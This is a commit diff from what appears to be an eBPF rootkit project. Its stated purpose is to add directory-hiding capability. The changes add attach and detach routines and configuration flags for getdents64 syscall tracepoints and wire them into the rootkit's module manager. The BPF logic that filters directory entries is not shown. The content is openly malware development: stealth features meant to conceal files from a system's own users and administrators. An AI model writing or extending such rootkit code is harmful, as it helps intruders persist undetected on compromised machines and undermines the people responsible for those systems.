Added hide directory capabilities for the rootkit

src/user/include/modules/fs.h

@@ -20,11 +20,22 @@ int attach_tp_sys_enter_openat(struct kit_bpf *skel){
     skel->links.tp_sys_enter_openat = bpf_program__attach(skel->progs.tp_sys_enter_openat);
 	return libbpf_get_error(skel->links.tp_sys_enter_openat);
 }
+int attach_tp_sys_enter_getdents64(struct kit_bpf *skel){
+    skel->links.tp_sys_enter_getdents64 = bpf_program__attach(skel->progs.tp_sys_enter_getdents64);
+	return libbpf_get_error(skel->links.tp_sys_enter_getdents64);
+}
+int attach_tp_sys_exit_getdents64(struct kit_bpf *skel){
+    skel->links.tp_sys_exit_getdents64 = bpf_program__attach(skel->progs.tp_sys_exit_getdents64);
+	return libbpf_get_error(skel->links.tp_sys_exit_getdents64);
+}
+
 
 int attach_fs_all(struct kit_bpf *skel){
     return attach_tp_sys_enter_read(skel) || 
         attach_tp_sys_exit_read(skel) ||
-        attach_tp_sys_enter_openat(skel);
+        attach_tp_sys_enter_openat(skel)||
+        attach_tp_sys_enter_getdents64(skel) ||
+        attach_tp_sys_exit_getdents64(skel);
 }
 
 
@@ -52,11 +63,29 @@ int detach_tp_sys_enter_openat(struct kit_bpf *skel){
     }
     return 0;
 }
+int detach_tp_sys_enter_getdents64(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.tp_sys_enter_getdents64);
+    if(err<0){
+        fprintf(stderr, "Failed to detach fs link\n");
+        return -1;
+    }
+    return 0;
+}
+int detach_tp_sys_exit_getdents64(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.tp_sys_exit_getdents64);
+    if(err<0){
+        fprintf(stderr, "Failed to detach fs link\n");
+        return -1;
+    }
+    return 0;
+}
 
 int detach_fs_all(struct kit_bpf *skel){
     return detach_tp_sys_enter_read(skel) || 
         detach_tp_sys_exit_read(skel) ||
-        detach_tp_sys_enter_openat(skel);
+        detach_tp_sys_enter_openat(skel)||
+        detach_tp_sys_enter_getdents64(skel)||
+        detach_tp_sys_exit_getdents64(skel);
 }
 
 #endif

src/user/include/modules/module_manager.c

@@ -18,7 +18,9 @@ module_config_t module_config = {
         .all = ON,
         .tp_sys_enter_read = OFF,
         .tp_sys_exit_read = OFF,
-        .tp_sys_enter_openat = OFF
+        .tp_sys_enter_openat = OFF,
+        .tp_sys_enter_getdents64 = OFF,
+        .tp_sys_exit_getdents64 = OFF
     },
     .exec_module = {
         .all = ON,
@@ -74,6 +76,8 @@ int setup_all_modules(){
         if(config.fs_module.tp_sys_enter_read == ON) ret = attach_tp_sys_enter_read(attr.skel);
         if(config.fs_module.tp_sys_exit_read == ON) ret = attach_tp_sys_exit_read(attr.skel);
         if(config.fs_module.tp_sys_enter_openat == ON) ret = attach_tp_sys_enter_openat(attr.skel);
+        if(config.fs_module.tp_sys_enter_getdents64 == ON) ret = attach_tp_sys_enter_getdents64(attr.skel);
+        if(config.fs_module.tp_sys_exit_getdents64 == ON) ret = attach_tp_sys_exit_getdents64(attr.skel);
     }
     if(ret!=0) return -1;
 

src/user/include/modules/module_manager.h

@@ -28,6 +28,8 @@ typedef struct module_config_t{
         char tp_sys_enter_read;
         char tp_sys_exit_read;
         char tp_sys_enter_openat;
+        char tp_sys_enter_getdents64;
+        char tp_sys_exit_getdents64;
     }fs_module;
 
     struct exec_module {